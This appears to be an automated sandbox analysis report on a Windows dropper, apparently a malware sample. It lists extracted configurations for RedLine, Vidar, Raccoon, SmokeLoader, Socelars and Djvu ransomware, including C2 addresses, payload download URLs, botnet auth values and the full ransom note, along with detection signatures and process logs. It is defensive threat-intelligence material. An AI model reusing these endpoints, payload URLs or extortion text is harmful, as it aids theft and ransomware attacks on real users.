djvu | dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d

Analysis

max time kernel
132s
max time network
163s
platform
windows10-2004_x64
resource
win10v2004-20220310-en
submitted
14-03-2022 01:20

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
Size

7.8MB
MD5

f61688b2ef805b574c30cc90cfc8e868
SHA1

6bcef7015c4dad4e5e2408f98ce15954447f3607
SHA256

dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d
SHA512

d269314e2c26f7b0274f52df266f2d96eda16955d562bd56da57348bd7d9e2c63299fa487b6defba9fc839df27a32cb03a2dfed7e4576bb1835a0672c99a5b1a

Malware Config

Extracted

Family

socelars

http://www.iyiqian.com/

http://www.xxhufdc.top/

http://www.uefhkice.xyz/

http://www.fcektsy.top/

Extracted

Family

metasploit

Version

windows/single_exec

Extracted

Family

smokeloader

Version

2020

http://varmisende.com/upload/

http://fernandomayol.com/upload/

http://nextlytm.com/upload/

http://people4jan.com/upload/

http://asfaltwerk.com/upload/

rc4.i32

Extracted

Family

redline

Botnet

ruzki000

86.107.197.196:63065

Attributes

auth_value
80fac7f67bd38aa709bbeef7a44ccb47

Extracted

Family

vidar

Version

50.7

Botnet

937

https://ruhr.social/@sam9al

https://koyu.space/@samsa2l

Attributes

profile_id
937

Extracted

Family

djvu

http://fuyt.org/test3/get.php

Attributes

extension
.xcbg
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn

rsa_pubkey.plain

Extracted

Family

raccoon

Botnet

ccba3157b9f42051adf38fbb8f5d0aca7f2b7366

Attributes

url4cnc
http://185.163.204.81/nui8xtgen
http://194.180.191.33/nui8xtgen
http://174.138.11.98/nui8xtgen
http://194.180.191.44/nui8xtgen
http://91.219.236.120/nui8xtgen
https://t.me/nui8xtgen

rc4.plain

Extracted

Family

redline

Botnet

@ywqmre

185.215.113.24:15994

Attributes

auth_value
5a482aa0be2b5e01649fe7a3ce943422

Extracted

Family

redline

Botnet

ruz876

185.215.113.7:5186

Attributes

auth_value
4750f6742a496bbe74a981d51e7680ad

Extracted

Family

redline

Botnet

ruzki12_03

176.122.23.55:11768

Attributes

auth_value
c51ddc8008e8581a01cec6e8291c5530

Extracted

Family

redline

Botnet

pizzadlyashekera

65.108.101.231:14648

Attributes

auth_value
7d6b3cb15fc835e113d8c22bd7cfe2b4

Extracted

Family

redline

Botnet

Installs

94.23.1.92:12857

Attributes

auth_value
c8e146507a5c0004dfcc77a7c5f15bc2

Signatures

Detected Djvu ransomware 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1664-263-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/3672-266-0x00000000021F0000-0x000000000230B000-memory.dmp	family_djvu
behavioral2/memory/1664-271-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1664-273-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu
behavioral2/memory/1664-278-0x0000000000400000-0x0000000000537000-memory.dmp	family_djvu

Djvu Ransomware
Ransomware which is a variant of the STOP family.
ransomware djvu
Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba Payload 4 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4236-171-0x0000000002F10000-0x0000000003837000-memory.dmp	family_glupteba
behavioral2/memory/4236-172-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/3948-177-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba
behavioral2/memory/2432-195-0x0000000000400000-0x0000000002584000-memory.dmp	family_glupteba

MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
trojan backdoor metasploit
Modifies Windows Defender Real-time Protection settings 3 TTPs
evasion trojan

Modify Registry
T1112

Modify Existing Service
T1031

Disabling Security Tools
T1089
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
loader onlylogger
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 11 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1132-224-0x0000000000D00000-0x0000000000D20000-memory.dmp	family_redline
C:\Users\Admin\Pictures\Adobe Films\KkiAf2kCNTKXF1pLiOaEWg8C.exe	family_redline
C:\Users\Admin\Pictures\Adobe Films\KkiAf2kCNTKXF1pLiOaEWg8C.exe	family_redline
behavioral2/memory/2800-244-0x0000000000370000-0x0000000000524000-memory.dmp	family_redline
behavioral2/memory/2800-276-0x0000000000370000-0x0000000000524000-memory.dmp	family_redline
behavioral2/memory/2800-279-0x0000000000370000-0x0000000000524000-memory.dmp	family_redline
behavioral2/memory/876-317-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/3584-316-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/4708-315-0x0000000000120000-0x0000000000140000-memory.dmp	family_redline
behavioral2/memory/4000-314-0x0000000000400000-0x0000000000420000-memory.dmp	family_redline
behavioral2/memory/2404-313-0x0000000000510000-0x0000000000530000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Socelars
Socelars is an infostealer targeting browser cookies and credit card credentials.
stealer socelars

Socelars Payload 2 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars
C:\Users\Admin\AppData\Local\Temp\Install.exe	family_socelars

Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs

Processes:

svchost.exe

description pid process target process

PID 4240 created 4236 4240 svchost.exe Graphics.exe
PID 4240 created 2432 4240 svchost.exe csrss.exe
Tofsee
Backdoor/botnet which carries out malicious activities based on commands from a C2 server.
trojan tofsee
Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata: ET MALWARE Win32.Raccoon Stealer - Telegram Mirror Checkin (generic)
suricata
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata: ET MALWARE Win32.Raccoon Stealer Checkin M6
suricata
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
evasion

Query Registry
T1012

Virtualization/Sandbox Evasion
T1497

description	pid	process	target process
PID 4240 created 4236	4240	svchost.exe	Graphics.exe
PID 4240 created 2432	4240	svchost.exe	csrss.exe

OnlyLogger Payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4924-242-0x00000000006F0000-0x0000000000734000-memory.dmp	family_onlylogger
behavioral2/memory/4924-250-0x0000000000400000-0x000000000048C000-memory.dmp	family_onlylogger

Vidar Stealer 2 IoCs

stealer

Processes:

resource	yara_rule
behavioral2/memory/4108-260-0x0000000000400000-0x00000000004CE000-memory.dmp	family_vidar
behavioral2/memory/4108-264-0x0000000001FC0000-0x000000000206C000-memory.dmp	family_vidar

Blocklisted process makes network request 1 IoCs

Processes:

rundll32.exe

flow pid process

266 2772 rundll32.exe
Creates new service(s) 1 TTPs
persistence

New Service
T1050
Downloads MZ/PE file

flow	pid	process
266	2772	rundll32.exe

Executes dropped EXE 48 IoCs

Processes:

SoCleanInst.exemd9_1sjm.exeFolder.exeGraphics.exeUpdbdate.exeInstall.exeFiles.exepub2.exeFile.exejfiag3g_gg.exejfiag3g_gg.exeGraphics.execsrss.exeinjector.exeZzKf08aJT65s8mbuXkOfj5s2.exeAowVglzgHgeYTJHJgd0EbCha.exeyilMEqc2OnCuWXggZ5Wvqspr.exe4ImnAAlTfIviXcF8sF3kuGjm.exe2DJKIPWfJHodIWIFhg_UsFQg.exeUj5Grqe1heyitIakbRjlVE_M.exeSea44K_kRZ3We5R5eaMK9iKZ.exepAI3i8q2x5MNuhj3LsMeADO2.exeBew94hn6SQH_kEJ2Qr1S4hVc.exeGeOTKmxtuLZW2GHDrc8f4Psk.exe2TUXRt3nRuL7ml_FpKXdseKN.exezjcg2G7_6flQxpQGdnayMtzP.exeAgZwXYH5B2w8JzpCM8z4awg0.exeKkiAf2kCNTKXF1pLiOaEWg8C.exeL5GWogrRjr3mIsto0YlJMZtJ.exeLQ8EGMztPvcf7Cm9AwCL3jwO.exem9dvpW0hMK6oukeDQbAR3VQc.exeMpFAZGCy3faZVe9SqA6gAAbh.exeeP_kSFEt4D7h8o3_SYTwq4Nt.exejWEXdkAjoR3u59hYM3ZIoe4y.exeYdgTql2LfPAXadkVN7iqQoz9.exepAI3i8q2x5MNuhj3LsMeADO2.exeInstall.exeQ220XCw5sxrXeHH2DwwbnIaK.exeInstall.exeHhSCbTXMFQjxkk_Tdl64t7sJ.exed34c604b-f975-484f-bf57-88c388ec6bb6.exeEtaKN4_0pP7Q67ZzHQr5Hnyc.exechqhRMiSjEE0Y0ddM5wdKtnQ.exequEATuAAYyWo343c1CUsjvKL.exeizacevkd.execmd.exeKaAa7aogiVFFjGBRnq8SpRfN.exeZCu24pbsjs7XbwH2fkfqWpuc.exe

pid	process
1276	SoCleanInst.exe
2676	md9_1sjm.exe
4164	Folder.exe
4236	Graphics.exe
2472	Updbdate.exe
5100	Install.exe
1424	Files.exe
1256	pub2.exe
4320	File.exe
1072	jfiag3g_gg.exe
912	jfiag3g_gg.exe
3948	Graphics.exe
2432	csrss.exe
2368	injector.exe
400	ZzKf08aJT65s8mbuXkOfj5s2.exe
4924	AowVglzgHgeYTJHJgd0EbCha.exe
4396	yilMEqc2OnCuWXggZ5Wvqspr.exe
4108	4ImnAAlTfIviXcF8sF3kuGjm.exe
4532	2DJKIPWfJHodIWIFhg_UsFQg.exe
3988	Uj5Grqe1heyitIakbRjlVE_M.exe
1540	Sea44K_kRZ3We5R5eaMK9iKZ.exe
3672	pAI3i8q2x5MNuhj3LsMeADO2.exe
4668	Bew94hn6SQH_kEJ2Qr1S4hVc.exe
2800	GeOTKmxtuLZW2GHDrc8f4Psk.exe
4696	2TUXRt3nRuL7ml_FpKXdseKN.exe
4064	zjcg2G7_6flQxpQGdnayMtzP.exe
4468	AgZwXYH5B2w8JzpCM8z4awg0.exe
1132	KkiAf2kCNTKXF1pLiOaEWg8C.exe
364	L5GWogrRjr3mIsto0YlJMZtJ.exe
2712	LQ8EGMztPvcf7Cm9AwCL3jwO.exe
2064	m9dvpW0hMK6oukeDQbAR3VQc.exe
3884	MpFAZGCy3faZVe9SqA6gAAbh.exe
4284	eP_kSFEt4D7h8o3_SYTwq4Nt.exe
3780	jWEXdkAjoR3u59hYM3ZIoe4y.exe
3852	YdgTql2LfPAXadkVN7iqQoz9.exe
1664	pAI3i8q2x5MNuhj3LsMeADO2.exe
3044	Install.exe
4136	Q220XCw5sxrXeHH2DwwbnIaK.exe
1632	Install.exe
2580	HhSCbTXMFQjxkk_Tdl64t7sJ.exe
4424	d34c604b-f975-484f-bf57-88c388ec6bb6.exe
708	EtaKN4_0pP7Q67ZzHQr5Hnyc.exe
2156	chqhRMiSjEE0Y0ddM5wdKtnQ.exe
4348	quEATuAAYyWo343c1CUsjvKL.exe
2352	izacevkd.exe
1844	cmd.exe
4656	KaAa7aogiVFFjGBRnq8SpRfN.exe
1804	ZCu24pbsjs7XbwH2fkfqWpuc.exe

Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe	upx
C:\Users\Admin\Pictures\Adobe Films\Uj5Grqe1heyitIakbRjlVE_M.exe	upx
C:\Users\Admin\Pictures\Adobe Films\Uj5Grqe1heyitIakbRjlVE_M.exe	upx

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

zjcg2G7_6flQxpQGdnayMtzP.exeMpFAZGCy3faZVe9SqA6gAAbh.exem9dvpW0hMK6oukeDQbAR3VQc.exeBew94hn6SQH_kEJ2Qr1S4hVc.exeL5GWogrRjr3mIsto0YlJMZtJ.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	zjcg2G7_6flQxpQGdnayMtzP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	MpFAZGCy3faZVe9SqA6gAAbh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	MpFAZGCy3faZVe9SqA6gAAbh.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	m9dvpW0hMK6oukeDQbAR3VQc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	zjcg2G7_6flQxpQGdnayMtzP.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Bew94hn6SQH_kEJ2Qr1S4hVc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Bew94hn6SQH_kEJ2Qr1S4hVc.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	L5GWogrRjr3mIsto0YlJMZtJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	L5GWogrRjr3mIsto0YlJMZtJ.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	m9dvpW0hMK6oukeDQbAR3VQc.exe

Checks computer location settings 2 TTPs 6 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

Q220XCw5sxrXeHH2DwwbnIaK.exedc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exeFile.exeSea44K_kRZ3We5R5eaMK9iKZ.exejWEXdkAjoR3u59hYM3ZIoe4y.exeyilMEqc2OnCuWXggZ5Wvqspr.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Q220XCw5sxrXeHH2DwwbnIaK.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	dc6545c910d07093bae7e8b012e64dfae4cd2c91f188ab542a34928b7867340d.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	File.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	Sea44K_kRZ3We5R5eaMK9iKZ.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	jWEXdkAjoR3u59hYM3ZIoe4y.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\Control Panel\International\Geo\Nation	yilMEqc2OnCuWXggZ5Wvqspr.exe

Loads dropped DLL 2 IoCs

Processes:

4ImnAAlTfIviXcF8sF3kuGjm.exe

pid process

4108 4ImnAAlTfIviXcF8sF3kuGjm.exe
4108 4ImnAAlTfIviXcF8sF3kuGjm.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

pid	process
4108	4ImnAAlTfIviXcF8sF3kuGjm.exe
4108	4ImnAAlTfIviXcF8sF3kuGjm.exe

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

Files.exeGraphics.exejWEXdkAjoR3u59hYM3ZIoe4y.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.ex"	Files.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SnowySun = "\"C:\\Windows\\rss\\csrss.exe\""	Graphics.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2403053463-4052593947-3703345493-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\dauthxgv = "\"C:\\Users\\Admin\\izacevkd.exe\""	jWEXdkAjoR3u59hYM3ZIoe4y.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

md9_1sjm.exezjcg2G7_6flQxpQGdnayMtzP.exeBew94hn6SQH_kEJ2Qr1S4hVc.exeMpFAZGCy3faZVe9SqA6gAAbh.exeL5GWogrRjr3mIsto0YlJMZtJ.exem9dvpW0hMK6oukeDQbAR3VQc.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	md9_1sjm.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	zjcg2G7_6flQxpQGdnayMtzP.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Bew94hn6SQH_kEJ2Qr1S4hVc.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	MpFAZGCy3faZVe9SqA6gAAbh.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	L5GWogrRjr3mIsto0YlJMZtJ.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	m9dvpW0hMK6oukeDQbAR3VQc.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 6 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

124 ipinfo.io
236 ipinfo.io
259 ipinfo.io
260 ipinfo.io
29 ip-api.com
123 ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs

Processes:

GeOTKmxtuLZW2GHDrc8f4Psk.exe

pid process

2800 GeOTKmxtuLZW2GHDrc8f4Psk.exe

flow	ioc
124	ipinfo.io
236	ipinfo.io
259	ipinfo.io
260	ipinfo.io
29	ip-api.com
123	ipinfo.io

pid	process
2800	GeOTKmxtuLZW2GHDrc8f4Psk.exe

Suspicious use of SetThreadContext 6 IoCs

Processes:

pAI3i8q2x5MNuhj3LsMeADO2.exezjcg2G7_6flQxpQGdnayMtzP.exeL5GWogrRjr3mIsto0YlJMZtJ.exeBew94hn6SQH_kEJ2Qr1S4hVc.exeMpFAZGCy3faZVe9SqA6gAAbh.exem9dvpW0hMK6oukeDQbAR3VQc.exe

description	pid	process	target process
PID 3672 set thread context of 1664	3672	pAI3i8q2x5MNuhj3LsMeADO2.exe	pAI3i8q2x5MNuhj3LsMeADO2.exe
PID 4064 set thread context of 4000	4064	zjcg2G7_6flQxpQGdnayMtzP.exe	AppLaunch.exe
PID 364 set thread context of 2404	364	L5GWogrRjr3mIsto0YlJMZtJ.exe	AppLaunch.exe
PID 4668 set thread context of 4708	4668	Bew94hn6SQH_kEJ2Qr1S4hVc.exe	AppLaunch.exe
PID 3884 set thread context of 3584	3884	MpFAZGCy3faZVe9SqA6gAAbh.exe	AppLaunch.exe
PID 2064 set thread context of 876	2064	m9dvpW0hMK6oukeDQbAR3VQc.exe	AppLaunch.exe

Drops file in Program Files directory 2 IoCs

Processes:

yilMEqc2OnCuWXggZ5Wvqspr.exe

description	ioc	process
File opened for modification	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	yilMEqc2OnCuWXggZ5Wvqspr.exe
File created	C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe	yilMEqc2OnCuWXggZ5Wvqspr.exe

Drops file in Windows directory 2 IoCs

Processes:

Graphics.exe

description ioc process

File opened for modification C:\Windows\rss Graphics.exe
File created C:\Windows\rss\csrss.exe Graphics.exe
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

description	ioc	process
File opened for modification	C:\Windows\rss	Graphics.exe
File created	C:\Windows\rss\csrss.exe	Graphics.exe

Program crash 64 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1840	4236	WerFault.exe	Graphics.exe
3700	4236	WerFault.exe	Graphics.exe
3352	4236	WerFault.exe	Graphics.exe
804	4236	WerFault.exe	Graphics.exe
1244	4236	WerFault.exe	Graphics.exe
3996	4236	WerFault.exe	Graphics.exe
940	4236	WerFault.exe	Graphics.exe
4480	4236	WerFault.exe	Graphics.exe
1736	4236	WerFault.exe	Graphics.exe
2244	4236	WerFault.exe	Graphics.exe
3988	4236	WerFault.exe	Graphics.exe
1540	4236	WerFault.exe	Graphics.exe
2060	4236	WerFault.exe	Graphics.exe
1156	4236	WerFault.exe	Graphics.exe
912	4236	WerFault.exe	Graphics.exe
1132	4236	WerFault.exe	Graphics.exe
1640	4236	WerFault.exe	Graphics.exe
4840	4236	WerFault.exe	Graphics.exe
1816	4236	WerFault.exe	Graphics.exe
1840	4236	WerFault.exe	Graphics.exe
3628	4236	WerFault.exe	Graphics.exe
4316	3948	WerFault.exe	Graphics.exe
2156	3948	WerFault.exe	Graphics.exe
4532	3948	WerFault.exe	Graphics.exe
4660	3948	WerFault.exe	Graphics.exe
4696	3948	WerFault.exe	Graphics.exe
2088	3948	WerFault.exe	Graphics.exe
4468	3948	WerFault.exe	Graphics.exe
4972	3948	WerFault.exe	Graphics.exe
1280	3948	WerFault.exe	Graphics.exe
2180	3948	WerFault.exe	Graphics.exe
1760	3948	WerFault.exe	Graphics.exe
3940	3948	WerFault.exe	Graphics.exe
2976	3948	WerFault.exe	Graphics.exe
4236	3948	WerFault.exe	Graphics.exe
3308	3948	WerFault.exe	Graphics.exe
1904	3948	WerFault.exe	Graphics.exe
4800	2432	WerFault.exe	csrss.exe
5052	2432	WerFault.exe	csrss.exe
3148	2432	WerFault.exe	csrss.exe
3460	2432	WerFault.exe	csrss.exe
3164	2432	WerFault.exe	csrss.exe
4088	2432	WerFault.exe	csrss.exe
396	2432	WerFault.exe	csrss.exe
1140	2432	WerFault.exe	csrss.exe
5104	2432	WerFault.exe	csrss.exe
4424	2432	WerFault.exe	csrss.exe
2316	2432	WerFault.exe	csrss.exe
4656	2432	WerFault.exe	csrss.exe
4620	2432	WerFault.exe	csrss.exe
2292	2432	WerFault.exe	csrss.exe
1712	2432	WerFault.exe	csrss.exe
1644	2432	WerFault.exe	csrss.exe
4516	2432	WerFault.exe	csrss.exe
4856	2432	WerFault.exe	csrss.exe
1088	2432	WerFault.exe	csrss.exe
988	2432	WerFault.exe	csrss.exe
3892	2432	WerFault.exe	csrss.exe
5064	2432	WerFault.exe	csrss.exe
4784	2432	WerFault.exe	csrss.exe
5032	2432	WerFault.exe	csrss.exe
4980	2432	WerFault.exe	csrss.exe
2244	4696	WerFault.exe	2TUXRt3nRuL7ml_FpKXdseKN.exe
3544	4924	WerFault.exe	AowVglzgHgeYTJHJgd0EbCha.exe

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

pub2.execmd.exe

description	ioc	process
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cmd.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cmd.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	pub2.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

4ImnAAlTfIviXcF8sF3kuGjm.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	4ImnAAlTfIviXcF8sF3kuGjm.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	4ImnAAlTfIviXcF8sF3kuGjm.exe

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

5012 schtasks.exe
1256 schtasks.exe
4304 schtasks.exe
5580 schtasks.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

4972 taskkill.exe
5220 taskkill.exe

pid	process
5012	schtasks.exe
1256	schtasks.exe
4304	schtasks.exe
5580	schtasks.exe

pid	process
4972	taskkill.exe
5220	taskkill.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

Graphics.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1972 = "Belarus Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-601 = "Taipei Daylight Time"	Graphics.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time"	Graphics.exe
